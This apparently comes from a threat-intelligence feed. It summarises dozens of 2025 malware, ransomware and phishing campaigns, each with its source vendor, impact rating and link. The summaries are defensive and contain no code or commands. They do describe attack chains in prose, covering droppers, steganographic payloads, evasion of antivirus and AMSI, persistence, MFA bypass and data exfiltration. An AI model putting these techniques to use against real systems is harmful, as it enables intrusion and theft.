Researchers from Cyfirma have uncovered a spear-phishing campaign conducted by APT36, also known as Transparent Tribe, targeting Indian defense personnel who use BOSS Linux systems. The attackers send ZIP archives containing a malicious desktop shortcut file. When clicked, it downloads and displays a legitimate PowerPoint decoy while simultaneously retrieving and launching a Go-based ELF binary in the background. The ELF payload establishes a persistent C2 channel over a non-standard port, enabling data exfiltration and covert screenshot capture. It also gathers system information, enumerates storage drives, and uses obfuscated logging routines to evade detection.
Source: https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/
2025-07-07
Atera_RMM_Phishing_Campaign
MEDIUM
Intel Source:
KB4ThreatLabs
Intel Name:
Atera_RMM_Phishing_Campaign
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
Researchers from KnowBe4 ThreatLabs have identified a targeted phishing campaign exploiting Social Security statement updates to distribute a malicious MSI installer masquerading as the Atera Agent RMM. On July 3, 2025, threat actors leveraged compromised email accounts to send a lure offering a “30-day free trial,” thereby deploying the legitimate Atera RMM on Windows hosts. By abusing the platform’s living-off-the-land capabilities, adversaries establish persistent C2 channels that enable file transfers, interactive shell access and AI-assisted command execution via the RMM web console.
Source: https://x.com/Kb4Threatlabs/status/1940759187514183827
2025-07-07
AiLock_Ransomware_Operation
MEDIUM
Intel Source:
Medium(S2W Threat Research)
Intel Name:
AiLock_Ransomware_Operation
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
Researchers at S2W Threat Intelligence Center have observed the AiLock ransomware campaign emerge in March 2025, leveraging a dual-threaded ChaCha20 and NTRUEncrypt engine to encrypt files and deploy ransom demands. Initial detection by Zscaler highlighted two early victims, with five organizations publicly listed on the group’s leak site by July 4, 2025, confirming active data exfiltration. The actor exploits native Windows APIs to terminate critical services and empty recycle bins, maximizing encryption coverage, while employing XOR-based string obfuscation and multithreaded I/O Completion Ports for stealth and performance.
Source: https://medium.com/s2wblog/detailed-analysis-of-ailock-ransomware-1d3263beff15?source=rss----30a8766b5c42---4
2025-07-06
Hpingbot_Distributing_Malware_Via_Pastebin
MEDIUM
Intel Source:
NSFocus
Intel Name:
Hpingbot_Distributing_Malware_Via_Pastebin
Date of Scan:
2025-07-06
Impact:
MEDIUM
Summary:
NSFOCUS researchers have identified a new botnet known as hpingbot, written in Go and designed to operate across multiple platforms, including Linux, IoT, and Windows systems. This botnet abuses Pastebin to distribute its malicious payloads and leverages hping3 to launch DDoS attacks. It has two primary objectives: first, to deliver additional malware to compromised systems, and second, to conduct network attacks that can disrupt online services. It maintains communication with its C2 server by sending small heartbeat signals to Pastebin every ten seconds and downloads additional malicious tools via curl or wget commands. The malware employs multiple mechanisms, such as Systemd, SysVinit, and Cron, to maintain persistence.
Source: https://nsfocusglobal.com/hpingbot-a-new-botnet-family-based-on-pastebin-payload-delivery-chain-and-hping3-ddos-module/
2025-07-06
XwormRAT_Distributing_via_Steganography
LOW
Intel Source:
ASEC
Intel Name:
XwormRAT_Distributing_via_Steganography
Date of Scan:
2025-07-06
Impact:
LOW
Summary:
Researchers at ASEC have uncovered a phishing campaign distributing XwormRAT malware using steganography. The attackers send phishing emails containing a compressed .RAR archive that includes a VBScript and JavaScript hybrid file acting as a dropper. When opened, this script runs a PowerShell command that downloads a JPEG image which hides malicious code using steganography techniques. The PowerShell script removes dummy characters from the image and decodes Base64 or bitmap-encoded data to extract and execute the final XwormRAT payload. The campaign primarily targets corporate users involved in procurement and supply chains, using fake requests for quotation from a Hong Kong-based entity as lures.
Source: https://asec.ahnlab.com/ko/88785/
2025-07-06
Amazon_Prime_Day_Phishing_Campaign
LOW
Intel Source:
Checkpoint
Intel Name:
Amazon_Prime_Day_Phishing_Campaign
Date of Scan:
2025-07-06
Impact:
LOW
Summary:
Check Point researchers have uncovered a widespread phishing campaign targeting Amazon customers ahead of Prime Day 2025, scheduled for July 8th. Threat actors have registered numerous fake domains designed to impersonate official Amazon websites to trick users into revealing their login details and payment information. These spoofed websites closely mimic Amazon’s official sign-in pages, while the phishing emails, disguised as official Amazon communications, often use urgent subject lines such as "Refund Due – Amazon System Error" to lure recipients into clicking malicious links. Upon successful compromise, attackers can access user accounts, make unauthorized purchases, commit identity theft, and abuse saved gift cards.
Source: https://blog.checkpoint.com/research/amazon-prime-day-2025-deals-await-but-so-do-the-cyber-criminals-2/
2025-07-06
FoxyWallet_Malware_Campaign
LOW
Intel Source:
Koi Security
Intel Name:
FoxyWallet_Malware_Campaign
Date of Scan:
2025-07-06
Impact:
LOW
Summary:
Researchers at Koi Security have discovered a malicious campaign called FoxyWallet targeting cryptocurrency users since at least April 2025. The attackers developed over 40 counterfeit Firefox browser extensions that impersonate legitimate cryptocurrency wallets such as MetaMask, Coinbase, Trust Wallet, and Phantom. These fake extensions replicate the names, logos and open-source code of the original wallets while also inflating fake reviews to trick users into downloading them. Once installed, the extensions capture seed phrases and private keys through web portal input interception and silently exfiltrate information to attacker-controlled servers along with users’ external IP addresses.
Source: https://blog.koi.security/foxywallet-40-malicious-firefox-extensions-exposed-4c14419de486
2025-07-05
Exploitation_of_Java_Debug_for_Crypto_Mining
LOW
Intel Source:
WIZ
Intel Name:
Exploitation_of_Java_Debug_for_Crypto_Mining
Date of Scan:
2025-07-05
Impact:
LOW
Summary:
Researchers at Wiz discovered that an unknown attacker deployed a cryptomining payload after they exposed Java Debug Wire Protocol (JDWP) endpoints on a decoy TeamCity CI/CD server. The attackers scan the internet for systems with the JDWP port (TCP/5005) open, confirm active sessions, and then execute system commands using Java’s built-in tools. They download a malicious script that removes other miners and installs a hidden version of the XMRig miner disguised as a logrotate utility. To maintain persistence, the attackers make changes to ensure the miner restarts on login, reboot, or at scheduled times. They also leverage proxies and hardcoded configuration to hide the cryptocurrency wallet address and evade detection.
Source: https://www.wiz.io/blog/exposed-jdwp-exploited-in-the-wild
2025-07-05
Exploitation_of_SHELLTER_Framework_to_Spread_Malware
LOW
Intel Source:
Elastic Labs
Intel Name:
Exploitation_of_SHELLTER_Framework_to_Spread_Malware
Date of Scan:
2025-07-05
Impact:
LOW
Summary:
Researchers at Elastic Security have uncovered several financially motivated cyber campaigns leveraging SHELLTER Elite v11.0 to distribute data-stealing malware. This tool, which was released in April 2025, is being abused by attackers for its evasion capabilities. It enables malware to bypass both traditional antivirus and behaviour-based detection mechanisms by employing techniques such as AES-128 CBC encryption, fake code to confuse scanners, API obfuscation, and in-memory bypasses for Windows security features like AMSI. Additionally, attackers utilize stealth techniques including DLL preloading and indirect system calls to avoid detection. Researchers also identified three prominent infostealers being used: LUMMA, ARECHCLIENT2 (also known as Sectop RAT), and RHADAMANTHYS, each distributed through various platforms such as MediaFire, YouTube comments, and even underground forums.
Source: https://www.elastic.co/security-labs/taking-shellter
2025-07-05
MentalPositive_macOS_Stealer_Variant
LOW
Intel Source:
K7 Labs
Intel Name:
MentalPositive_macOS_Stealer_Variant
Date of Scan:
2025-07-05
Impact:
LOW
Summary:
K7 Security Labs researchers have observed a new macOS stealer attributed to the actor "mentalpositive," which mirrors core functionalities of the 2023 Atomic macOS Stealer (AMOS) but introduces distinct characteristics suggesting a potential fork or early-stage evolution. The malware targets macOS users and executes using Unix process-hollowing tactics to evade terminal and session management detection, employing system calls to disable terminal processes and maintain stealth.
Source: https://labs.k7computing.com/index.php/mentalpositives-new-macos-stealer-amos-repackaged-or-a-new-cyber-threat/
2025-07-04
Phishing_Campaigns_Exploit_ES_Domains_of_Spain
LOW
Intel Source:
Cofense
Intel Name:
Phishing_Campaigns_Exploit_ES_Domains_of_Spain
Date of Scan:
2025-07-04
Impact:
LOW
Summary:
Researchers at Cofense have observed a significant increase in the use of Spain’s top-level domain ending in [.]es to conduct phishing campaigns. The volume of malicious .es websites leveraged for phishing jumped nearly 20 times between late 2024 and early 2025. Threat actors are distributing emails containing .es links, either embedded directly in the message or within attachments to trick people into clicking. These links often redirect to deceptive login pages designed to steal usernames and passwords, especially for Microsoft accounts. These phishing campaigns impersonate major organisations such as Microsoft, Adobe and Google. These phishing sites are hosted on Cloudflare infrastructure and employ CAPTCHA challenges to enhance legitimacy and evade automated detection.
Source: https://cofense.com/blog/spain-tld-s-recent-rise-to-dominance
2025-07-04
Chinese_Actors_Targeting_E_Commerce_Websites
MEDIUM
Intel Source:
Silent Push
Intel Name:
Chinese_Actors_Targeting_E_Commerce_Websites
Date of Scan:
2025-07-04
Impact:
MEDIUM
Summary:
Researchers at Silent Push have uncovered a large-scale phishing campaign operated by a Chinese-speaking threat actor targeting online shoppers around the globe via thousands of spoofed e-commerce websites. These deceptive websites impersonate legitimate online retailers such as Apple, PayPal, Wayfair, REI, Michael Kors, and Nordstrom to execute fraudulent payment schemes. The campaign emerged during Mexico’s Hot Sale 2025 event, targeting Spanish-speaking users, but subsequent analysis revealed a widespread operation also targeting English-speaking consumers across multiple regions. Many of the spoofed domains embed functional Google Pay widgets that allow the attacker to steal legitimate payments through real transactions. The threat actors employ tactics including website cloning, abuse of online payment APIs, and site misdirection using deceptive branding and domain obfuscation. Researchers also believe that thousands of fraudulent sites remain active despite takedown efforts.
Source: https://www.silentpush.com/blog/fake-marketplace/?utm_source=rss&utm_medium=rss&utm_campaign=fake-marketplace
2025-07-04
LNK_Malware_Abuse_for_Stealthy_Payload_Delivery
MEDIUM
Intel Source:
unit42
Intel Name:
LNK_Malware_Abuse_for_Stealthy_Payload_Delivery
Date of Scan:
2025-07-04
Impact:
MEDIUM
Summary:
Researchers from Unit 42 have identified extensive and evolving misuse of Windows Shortcut (LNK) files by threat actors to facilitate covert malware execution. Adversaries are abusing the flexibility of LNK files to execute embedded or referenced payloads using trusted system binaries such as powershell.exe, cmd.exe, wscript.exe, and rundll32.exe. The observed techniques fall into four main categories: exploit-based execution, direct file execution, in-argument script execution, and overlay content delivery. The latter is increasingly favored, with attackers appending encoded malicious content to the end of LNK files and executing it through scripts or utilities like findstr or mshta.exe. Obfuscation of command-line arguments, dynamic environment variable usage, and base64-encoded payloads are employed to evade detection and hinder analysis.
Source: https://unit42.paloaltonetworks.com/lnk-malware/
2025-07-04
Ivanti_CSA_Zero_Day_Exploitation_Campaign
HIGH
Intel Source:
France’s Cybersecurity Agency - ANSSI
Intel Name:
Ivanti_CSA_Zero_Day_Exploitation_Campaign
Date of Scan:
2025-07-04
Impact:
HIGH
Summary:
According to ANSSI’s analysis, the Houken intrusion set leveraged three zero-day vulnerabilities in Ivanti Cloud Service Appliance (CVE-2024-8190, CVE-2024-8963 and CVE-2024-9380) in September 2024 to gain initial access to French governmental, telecommunications, media, finance and transport networks. Operators executed a base64-encoded Python script to decrypt and harvest administrative credentials, deployed or created PHP webshells, modified legitimate PHP resources to embed backdoors and occasionally installed a sophisticated kernel-space rootkit for persistence. Infrastructure relied on commercial VPN services, Tor exit nodes and diverse VPS configurations, indicating a blend of commodity services and bespoke tooling. ANSSI suspects Houken acts as an initial access broker linked to UNC5174, selling footholds to state-linked entities while also exhibiting profit-driven behaviors such as data exfiltration and cryptomining.
Source: https://www.cert.ssi.gouv.fr/uploads/CERTFR-2025-CTI-009.pdf
2025-07-03
DCRat_Masquerades_as_Colombian_Government
MEDIUM
Intel Source:
Fortinet
Intel Name:
DCRat_Masquerades_as_Colombian_Government
Date of Scan:
2025-07-03
Impact:
MEDIUM
Summary:
Researchers at FortiGuard Labs have identified an ongoing malware campaign leveraging DCRat, a modular remote access trojan, to target entities in Colombia through a phishing operation that impersonates a Colombian government agency. The attack chain begins with a ZIP file delivered via email, containing an obfuscated VBS script designed to evade detection and analysis. This script launches obfuscated PowerShell code that retrieves a second-stage image payload encoded with base64 data and steganography, which ultimately delivers the RAT executable.
Source: https://www.fortinet.com/blog/threat-research/dcrat-impersonating-the-columbian-government
2025-07-03
DPRK_NimDoor_Malware_Targeting_macOS
LOW
Intel Source:
SentinelLABS
Intel Name:
DPRK_NimDoor_Malware_Targeting_macOS
Date of Scan:
2025-07-03
Impact:
LOW
Summary:
SentinelLABS researchers have uncovered a sophisticated campaign by DPRK threat actors, dubbed NimDoor, targeting Web3 and crypto-related businesses on the macOS platform. The operation, active since at least April 2025, begins with social engineering to trick users into running a malicious AppleScript disguised as a Zoom update. This initiates a multi-stage attack using an eclectic mix of C++, AppleScript, and Nim-compiled binaries. The actors employ advanced and unusual TTPs for macOS, including process injection, encrypted WebSocket (wss) for C2 communications, and a novel persistence mechanism that uses signal handlers (SIGINT/SIGTERM) to install a LaunchAgent upon termination. The ultimate goal is to exfiltrate sensitive data, including Keychain credentials, browser data, and Telegram user information, using custom Bash scripts.
Source: https://www.sentinelone.com/labs/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/
2025-07-02
Snake_Keylogger_Phishing_Targets_Oil_Sector
MEDIUM
Intel Source:
OTS Security
Intel Name:
Snake_Keylogger_Phishing_Targets_Oil_Sector
Date of Scan:
2025-07-02
Impact:
MEDIUM
Summary:
OTS Security researchers have observed a new spear-phishing campaign that delivers the Russian-origin Snake Keylogger to targets in the global oil and gas industry by impersonating a Kazakh petroleum company. The attack uses a novel DLL sideloading technique, abusing the legitimate Java utility jsadebugd.exe to inject the stealer malware into the InstallUtil.exe process. Once active, the malware establishes persistence via a registry Run key and harvests a wide range of credentials from dozens of browsers and applications for exfiltration over SMTP.
Source: https://mp.weixin.qq.com/s/cQ0cV_lbvGH3q6JI8TtNRQ
2025-07-02
Janela_RAT_with_Chromium_Stealer_Extension
LOW
Intel Source:
Medium (Walmart Global Tech Blog)
Intel Name:
Janela_RAT_with_Chromium_Stealer_Extension
Date of Scan:
2025-07-02
Impact:
LOW
Summary:
Walmart Global Tech researchers have observed a multi-stage attack campaign delivering Janela RAT alongside a malicious browser extension, leveraging MSI installers hosted on GitLab. The Janela RAT, a likely variant of BX RAT previously linked to LATAM targeting, is dropped via an installer that embeds a Go-based binary and multiple scripts. These scripts establish execution logic, unzip payloads, and load the browser extension covertly into Chromium-based browsers using native messaging APIs. The extension is equipped to execute commands such as screenshot capture, system reconnaissance, and data collection, including cookies, browsing history, and installed extensions. Command and control (C2) communication is facilitated via WebSockets and encoded configuration retrieved from GitLab-hosted files.
Source: https://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8
2025-07-02
DEVMAN_Ransomware
MEDIUM
Intel Source:
ANY.RUN
Intel Name:
DEVMAN_Ransomware
Date of Scan:
2025-07-02
Impact:
MEDIUM
Summary:
Researchers at ANY.RUN have uncovered a new ransomware strain, DEVMAN, operating as a custom variant within the DragonForce Ransomware-as-a-Service (RaaS) ecosystem. The actor primarily targets victims across Asia and Africa, using a dedicated leak site to pressure victims after data exfiltration and encryption. While reusing a significant amount of DragonForce's Conti-derived codebase, DEVMAN introduces unique traits, such as a flawed builder that encrypts its own ransom notes. Key TTPs include probing for SMB shares to spread laterally and abusing the Windows Restart Manager to bypass file locks and encrypt critical system files like NTUSER.DAT.
Source: https://any.run/cybersecurity-blog/devman-ransomware-analysis/
2025-07-01
CVE_2025_3248_Langflow_Exploit_for_Flodrix_Botnet
MEDIUM
Intel Source:
PolySwarm
Intel Name:
CVE_2025_3248_Langflow_Exploit_for_Flodrix_Botnet
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
PolySwarm researchers have identified active exploitation of a critical unauthenticated remote code execution vulnerability, CVE-2025-3248, in the Langflow AI development framework. Threat actors are leveraging publicly available proof-of-concept exploits to compromise unpatched Langflow instances and deploy the Flodrix botnet, a more advanced variant of the LeetHozer malware family. The attack chain begins with widespread scanning for exposed Langflow deployments, followed by exploitation to deliver a Python-based payload. Once infected, the Flodrix malware enables attackers to conduct DDoS attacks and potentially exfiltrate sensitive data, while employing evasion tactics such as self-deletion and string obfuscation to bypass detection. With a CVSS score of 9.8, this vulnerability presents a severe risk of complete system compromise and service disruption for organizations running outdated or unpatched versions of Langflow.
Source: https://blog.polyswarm.io/threat-actors-exploit-cve-2025-3248-to-deliver-flodrix-botnet
2025-07-01
RansomHub_Exploits_RDP_via_Password_Spray
MEDIUM
Intel Source:
The DFIR Report
Intel Name:
RansomHub_Exploits_RDP_via_Password_Spray
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
Researchers at The DFIR Report have observed a RansomHub affiliate campaign actively compromising networks through password spray attacks against exposed Remote Desktop Protocol (RDP) services, achieving complete network compromise and ransomware deployment in under six days. Following initial access, the attacker moves rapidly, using tools like Mimikatz for credential harvesting and network scanners for discovery. Persistence is established using legitimate remote management tools such as Atera and Splashtop to blend in with normal administrative activity.
Source: https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/
2025-07-01
UAC_0226_Targets_Government_and_Defence_Entities
MEDIUM
Intel Source:
Arctic Wolf Labs
Intel Name:
UAC_0226_Targets_Government_and_Defence_Entities
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
Researchers from Arctic Wolf have identified a malware named GIFTEDCROOK, developed by the cyber-espionage group UAC-0226. Initially this malware was a basic browser credential stealer, but it has since transformed into a sophisticated data exfiltration platform. The latest version (v1.3) is capable of stealing not only browser data but also sensitive files selected by their file type, size, and recent modification. UAC-0226 distributes this malware through spear-phishing emails containing a fake military-themed PDF attachment that impersonates Ukrainian government agencies. These campaigns coincided with critical geopolitical events, including the June 2025 Ukraine-Russia negotiations in Istanbul, which shows that the attackers are targeting Ukrainian government and military information for intelligence purposes. The malware employs encrypted file archives, sends stolen data through Telegram channels and deletes itself to evade detection.
Source: https://arcticwolf.com/resources/blog/giftedcrook-strategic-pivot-from-browser-stealer-to-data-exfiltration-platform/
2025-07-01
Anubis_RaaS_with_Wiper_Capability
MEDIUM
Intel Source:
picussecurity
Intel Name:
Anubis_RaaS_with_Wiper_Capability
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
Researchers at Picus Security have detailed the Anubis Ransomware-as-a-Service (RaaS) operation, a significant threat observed since December 2024 that has evolved to combine data encryption with an optional, destructive file-wiping function. Operators gain initial access via spear-phishing before executing the payload, which is highly configurable through command-line parameters. The malware performs stealthy privilege checks, disables security and backup services, and deletes Volume Shadow Copies to maximize impact and prevent recovery.
Source: https://www.picussecurity.com/resource/blog/anubis-ransomware-targets-global-victims-with-wiper-functionality
2025-06-30
Remcos_Malware_Campaign
LOW
Intel Source:
ForcePoint
Intel Name:
Remcos_Malware_Campaign
Date of Scan:
2025-06-30
Impact:
LOW
Summary:
Forcepoint researchers have uncovered an ongoing Remcos malware campaign that leverages phishing emails from compromised email accounts belonging to small businesses and educational institutions to maintain long-term access to infected systems. These emails contain malicious LNK files inside TAR archives which trigger a PowerShell script that downloads a hidden malware file disguised as a PDF. The malware leverages a special path-parsing technique (the \\?\C:\ prefix) to create fake Windows directories. It uses heavily obfuscated batch scripts and renames system tools to evade detection. The malware establishes persistence via scheduled tasks and weakens UAC protections by modifying registry settings. Once active, the malware injects itself into legitimate Windows processes like SndVol.exe and communicates with a C2 server hosted on OVHcloud using an uncommon port to receive instructions and send back stolen data.
Source: https://www.forcepoint.com/blog/x-labs/remcos-malware-new-face
2025-06-30
Blind_Eagle_Phishing_Campaign
MEDIUM
Intel Source:
Darktrace
Intel Name:
Blind_Eagle_Phishing_Campaign
Date of Scan:
2025-06-30
Impact:
MEDIUM
Summary:
Researchers at Darktrace have identified that the threat actor known as Blind Eagle (APT-C-36) is actively carrying out a phishing campaign targeting organizations across Latin America, with a particular emphasis on Colombia. The group primarily focuses on the government, financial, and critical infrastructure sectors. Their attack chain typically begins with a phishing email that leads victims to download a malicious payload, often exploiting the WebDAV protocol. Blind Eagle has shown a high degree of adaptability, continuing to employ low-interaction attack techniques even after the relevant Microsoft vulnerability was patched. The group uses Remote Access Trojans (RATs) and Dynamic DNS to establish resilient command-and-control (C2) infrastructure, enabling persistent access and extensive data exfiltration.
Source: https://www.darktrace.com/blog/patch-and-persist-darktraces-detection-of-blind-eagle-apt-c-36?&web_view=true
2025-06-28
APT28_Deploys_BEARDSHELL_and_COVENANT_Backdoors
MEDIUM
Intel Source:
CERT-UA
Intel Name:
APT28_Deploys_BEARDSHELL_and_COVENANT_Backdoors
Date of Scan:
2025-06-28
Impact:
MEDIUM
Summary:
CERT-UA researchers have observed that the UAC-0001 threat group (APT28) conducted a multi-stage cyber attack against Ukrainian government agencies in March-April 2024. The actors deployed a sophisticated toolset that includes the BEARDSHELL and SLIMAGENT backdoors, as well as the open-source COVENANT C2 framework. Initial access was likely gained through a malicious document delivered via the Signal messenger, which executed a macro to initiate a complex infection chain. This chain uses COM hijacking for persistence and leverages legitimate cloud services, such as Koofr and Icedrive, for C2 communications, making the traffic difficult to detect. The final payload, BEARDSHELL, is a C++ backdoor capable of loading and executing PowerShell scripts. The attack's objective appears to be espionage, underscored by the deployment of SLIMAGENT, a tool designed for taking and exfiltrating encrypted screenshots.
Source: https://cert.gov.ua/article/6284080
2025-06-27
SSA_Themed_Phishing_Campaign
LOW
Intel Source:
Cyberarmor
Intel Name:
SSA_Themed_Phishing_Campaign
Date of Scan:
2025-06-27
Impact:
LOW
Summary:
Researchers at CyberArmor have discovered a phishing campaign in which cybercriminals tricked over 2,000 people by impersonating official communications from the U.S. Social Security Administration (SSA). The attackers send phishing emails containing links that redirect to a deceptive SSA-themed page hosted on Amazon Web Services. This page instructs victims to click "Access The Statement", which redirects them to another page with instructions to download and execute a file. The downloaded file is a .NET-based malware loader. Once executed, the malware deploys ScreenConnect for remote access and activates a backdoor named ENTRYPOINT to silently connect to the attacker's server and gain control over the victim's system.
Source: https://cyberarmor.tech/hacker-exploit-social-security-statement-theme-to-target-over-2000-victims-with-malware/
2025-06-27
APT38_Infrastructure_Hunt_Uncovers_macOS_Malware
MEDIUM
Intel Source:
Darkatlas
Intel Name:
APT38_Infrastructure_Hunt_Uncovers_macOS_Malware
Date of Scan:
2025-06-27
Impact:
MEDIUM
Summary:
Darkatlas researchers have uncovered an active command-and-control infrastructure belonging to the North Korean state-sponsored threat actor APT38 (Bluenoroff). This financially motivated subgroup of the Lazarus Group continues to target the global financial sector, including banks, cryptocurrency exchanges, and SWIFT endpoints. By pivoting on technical fingerprints, such as the JARM hash of a known malicious server's SSL certificate, researchers identified a network of related infrastructure. This network was subsequently linked to the deployment of the Cosmic Rust malware family, a payload specifically designed to target macOS platforms. The findings demonstrate that APT38 remains active, is expanding its operational infrastructure, and is leveraging macOS malware as part of its espionage and theft campaigns.
Source: https://darkatlas.io/blog/bluenoroff-apt38-live-infrastructure-hunting
2025-06-26
Odyssey_Stealer_macOS_Infostealer
LOW
Intel Source:
Cyfirma
Intel Name:
Odyssey_Stealer_macOS_Infostealer
Date of Scan:
2025-06-26
Impact:
LOW
Summary:
Researchers at CYFIRMA have identified Odyssey Stealer, a Malware-as-a-Service (MaaS) info-stealer actively targeting macOS users. Attributed to a threat actor known as "Rodrigo," the malware is a rebrand of Poseidon Stealer and targets individuals in Western countries interested in finance and cryptocurrency, with command-and-control infrastructure primarily hosted in Russia. The attack begins with a "Clickfix" social engineering tactic, using typosquatted domains that present a fake Cloudflare CAPTCHA to trick users into running a malicious AppleScript command in their terminal. This script executes the primary payload, which is designed to steal a wide range of sensitive data, including browser credentials, session tokens, personal documents, macOS Keychain data, and, critically, private keys and seed phrases from numerous cryptocurrency wallets.
Source: https://www.cyfirma.com/research/odyssey-stealer-the-rebrand-of-poseidon-stealer/
2025-06-26
WogRAT_Malware_Targets_Window_and_Linux_Systems
LOW
Intel Source:
ASEC
Intel Name:
WogRAT_Malware_Targets_Window_and_Linux_Systems
Date of Scan:
2025-06-26
Impact:
LOW
Summary:
ASEC researchers have discovered a coordinated campaign that targets both Windows and Linux web servers, including IIS-based systems. The attackers gain initial access through file upload vulnerabilities to deploy ASP/ASPX web shells, enabling persistent access and command execution. After gaining access, the attackers leverage tools like Ladon, Fscan, MeshAgent, and WogRAT for scanning, privilege escalation, and remote access. The attackers show advanced capabilities by deploying malware that works on both Windows (PE) and Linux (ELF) systems. They also move across the network using Windows tools like WMIExec and steal login details using credential dumping tools such as Network Password Dump.
Source: https://asec.ahnlab.com/ko/88559/
2025-06-25
ASP_Phishing_Targets_Critics_of_Russia
MEDIUM
Intel Source:
Google Threat Intelligence
Intel Name:
ASP_Phishing_Targets_Critics_of_Russia
Date of Scan:
2025-06-25
Impact:
MEDIUM
Summary:
Researchers at Google Threat Intelligence Group (GTIG) report on a sophisticated social engineering campaign by UNC6293, a threat actor assessed with low confidence as being associated with the Russia-linked group APT29. Active since at least April 2025, the campaign targets prominent academics and critics of Russia to gain persistent access to their Gmail accounts. Attackers build rapport with targets before sending lures impersonating entities like the U.S. Department of State, using spoofed email addresses to enhance legitimacy. The objective is to convince the target to create a Google Application Specific Password (ASP) and share the 16-digit code, a method which bypasses standard multi-factor authentication and grants the actor ongoing access to the victim's mailbox.
Source: https://cloud.google.com/blog/topics/threat-intelligence/creative-phishing-academics-critics-of-russia
2025-06-25
Confucius_APT_Deploys_New_Anondoor_Backdoor
MEDIUM
Intel Source:
Knowsec 404 Advanced Threat Intelligence Team
Intel Name:
Confucius_APT_Deploys_New_Anondoor_Backdoor
Date of Scan:
2025-06-25
Impact:
MEDIUM
Summary:
The Knowsec 404 Advanced Threat Intelligence Team has identified an evolved malware campaign from the Confucius APT group. This campaign, targeting government and military entities in South and East Asia, deploys a new componentized backdoor named "anondoor." The attack initiates via a LNK file which uses a legitimate Python executable to side-load the malicious anondoor DLL. A key evolution in this campaign is the malware's modularity: anondoor acts as a downloader, receiving instructions and C2 details from the server to fetch and execute subsequent components, such as the "wooperstealer" infostealer. Persistence is established via a scheduled task created by the initial implant.
Source: https://paper.seebug.org/3332/
2025-06-24
Pickai_AI_Backdoor_Supply_Chain_Attack
LOW
Intel Source:
Xlab
Intel Name:
Pickai_AI_Backdoor_Supply_Chain_Attack
Date of Scan:
2025-06-24
Impact:
LOW
Summary:
Researchers from XLab have discovered that threat actors are actively exploiting vulnerabilities in the ComfyUI AI framework to deploy a C++ backdoor named Pickai. First observed in February 2025, the campaign's primary objective is the theft of sensitive AI-related data, leveraging command execution and reverse shell capabilities. The malware achieves stealth through process name spoofing and ensures survivability with a highly redundant persistence strategy, creating up to ten distinct service entries on compromised Linux hosts. In a significant escalation, the threat has become a supply chain attack, with malware being distributed from the compromised infrastructure of Rubick.ai, a commercial AI platform serving the e-commerce sector.
Source: https://blog.xlab.qianxin.com/pickai-the_backdoor_hiding_in_your_ai_stack/
2025-06-23
RapperBot_IoT_Botnet_Adds_Extortion
LOW
Intel Source:
Xlab Blog (Wang Hao)
Intel Name:
RapperBot_IoT_Botnet_Adds_Extortion
Date of Scan:
2025-06-23
Impact:
LOW
Summary:
Analysis from Qi'anxin's XLAB has revealed the continued evolution of the RapperBot botnet, a large-scale threat that has been active since at least 2021. Primarily used for DDoS-for-hire attacks, the botnet has recently pivoted to include direct extortion, demanding "protection fees" from victims. Comprising over 50,000 bots, the malware targets a wide range of industries globally by exploiting weak Telnet credentials and known vulnerabilities in IoT devices like routers and network cameras. The botnet employs evolving DNS TXT records for C2 discovery and features multiple custom encryption routines to protect its components.
Source: https://blog.xlab.qianxin.com/rapperbot-en/
2025-06-22
LogMeIn_RAT_Delivered_via_Vercel_Phishing
LOW
Intel Source:
CyberArmor
Intel Name:
LogMeIn_RAT_Delivered_via_Vercel_Phishing
Date of Scan:
2025-06-22
Impact:
LOW
Summary:
Researchers at CyberArmor have identified a phishing campaign, active for at least the past two months, in which threat actors abuse the legitimate Vercel hosting platform to deliver a malicious version of the LogMeIn remote access tool. Attackers use phishing emails with lures related to invoices and deliveries to direct victims to Vercel-hosted websites that impersonate an Adobe PDF viewer. Social engineering convinces the user to download and run an executable file, which installs the remote access tool and grants the attacker full control over the compromised machine. This abuse of trusted services like Vercel and LogMeIn is a deliberate tactic to bypass security controls and lower user suspicion, making detection difficult.
Source: https://cyberarmor.tech/threat-insight-cybercriminals-abusing-vercel-to-deliver-remote-access-malware/
2025-06-22
PowerShell_Loaders_Deploy_Cobalt_Strike
MEDIUM
Intel Source:
Hunt.IO
Intel Name:
PowerShell_Loaders_Deploy_Cobalt_Strike
Date of Scan:
2025-06-22
Impact:
MEDIUM
Summary:
Researchers at Hunt.io have identified a threat campaign leveraging PowerShell loaders to deliver Cobalt Strike beacons, utilizing infrastructure across China, Russia, and other global cloud platforms. Discovered in late May and early June 2025, the attack begins with a PowerShell script retrieved from an open directory on a Chinese server. This script executes shellcode in-memory, employing API hashing and reflective DLL injection to evade detection. The initial payload connects to a second-stage server on Baidu's cloud platform to retrieve the final Cobalt Strike beacon, which then communicates with a command-and-control server in Russia.
Source: https://hunt.io/blog/cobaltstrike-powershell-loader-chinese-russian-infrastructure
2025-06-21
TxTag_Toll_Phishing_Campaign
LOW
Intel Source:
Cofense
Intel Name:
TxTag_Toll_Phishing_Campaign
Date of Scan:
2025-06-21
Impact:
LOW
Summary:
Cofense researchers have discovered a phishing campaign impersonating TxTag, a legitimate toll collection service in Texas. The attackers send phishing emails that spoof a legitimate Indiana state government email address, leveraging a legitimate domain to deceive recipients. The email warns recipients about unpaid toll fees and threatens penalties or vehicle registration holds to induce urgency. If recipients click the embedded link, they are redirected to a deceptive website disguised as the official TxTag site, hosted on a fake domain (txtag-help[.]xyz), where victims are asked to enter personal information and credit card details; if the fake payment form claims the initial attempt failed, they are prompted for additional payment data.
Source: https://cofense.com/blog/txtag-takedown-busting-phishing-email-schemes
2025-06-20
CAPTCHA_Campaigns_Deliver_Malware
LOW
Intel Source:
Elastic Security Labs
Intel Name:
CAPTCHA_Campaigns_Deliver_Malware
Date of Scan:
2025-06-20
Impact:
LOW
Summary:
